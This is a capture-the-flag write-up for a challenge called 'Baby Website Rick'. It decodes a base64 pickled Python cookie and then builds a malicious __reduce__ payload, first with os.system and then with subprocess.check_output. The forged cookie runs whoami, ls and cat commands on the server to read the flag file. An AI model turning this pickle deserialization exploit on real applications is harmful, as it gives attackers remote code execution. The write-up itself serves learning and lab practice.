Baby Website Rick


All the references to pickles implies it's an insecure deserialization challenge. pickle is a serialization format used in python.

If we check the cookies, we get the following:


Our guess is that this is a pickled python object, and decoding the base64 seems to imply that to us too:

$ echo 'KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu' | base64 -d


Let's immediately try to unpickle the data, which should give us a feel for how data is parsed:

from base64 import b64decode

import pickle

code = b'KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu'

serum = pickle.loads(b64decode(code))
$ python3 
Traceback (most recent call last):
  File "", line 7, in <module>
    serum = pickle.loads(b64decode(code))
AttributeError: Can't get attribute 'anti_pickle_serum' on <module '__main__' from ''>

The error is quite clear - there's no anti_pickle_serum variable. Let's add one in and try again.

code = b'KGRwMApT[...]'
anti_pickle_serum = 'test'

That error is fixed, but there's another one:

$ python3 
Traceback (most recent call last):
  File "", line 8, in <module>
    serum = pickle.loads(b64decode(code))
  File "/usr/lib/python3.8/", line 43, in _reconstructor
    obj = object.__new__(cls)
TypeError: object.__new__(X): X is not a type object (str)

Here it's throwing an error because X (anti_pickle_serum) is not a type object - so let's make it a class extending from object!

# [imports]
class anti_pickle_serum(object):
    def __init__(self):
# [...]

And now there's no error, and we get a response!

$ python3 
{'serum': <__main__.anti_pickle_serum object at 0x7f9e1a1b1c40>}

So the cookie is the pickled form of a dictionary with the key serum and the value of an anti_pickle_serum class! Awesome.


For an introduction to pickle exploitation, I highly recommend this blog post. Essentially, the __reduce__ dunder method tells pickle how to deserialize, and to do so it takes a function and a list of parameters. We can set the function to os.system and the parameters to the code to execute!

from base64 import b64encode

import pickle
import os

class anti_pickle_serum(object):
    def __reduce__(self):               # function called by the pickler
        return os.system, (['whoami'],)

code = pickle.dumps({'serum': anti_pickle_serum()})
code = b64encode(code)

Here we create the malicious class, then serialize it as part of the dictionary as we saw before.

$ python3 

Huh, that looks nothing like the original cookie value (which starts with KGRwMApTJ3)... maybe we missed something with the dumps?

Checking out the dumps() documentation, there is a protocol parameter! If we read a bit deeper, this can take a value from 0 to 5. If we play around, protocol=0 looks similar to the original cookie:

code = pickle.dumps({'serum': anti_pickle_serum()}, protocol=0)
$ python3 

Let's change the cookie to this (without the b''):

As you can see now, the value 0 was returned. This is the return value of os.system! Now we simply need to find a function that returns the result, and we'll use subprocess.check_output for that.

For reasons unknown to me, python3 pickles this differently to python2 and doesn't work. I'll therefore be using python2 from now on, but if anybody know why that would happen, please let me know!

return subprocess.check_output, (['ls'],)

Now run it

$ python 

And input it as the cookie.

As can now see that there is a flag_wIp1b file, so we can just read it!

While it's tempting to do

return subprocess.check_output, (['cat flag_wIp1b'],)

subprocess.check_output requires a list of parameters (as we see here) and the filename is a separate item in the list, like so:

return subprocess.check_output, (['cat', 'flag_wIp1b'],)
$ python 

And boom - we get the flag!


Last updated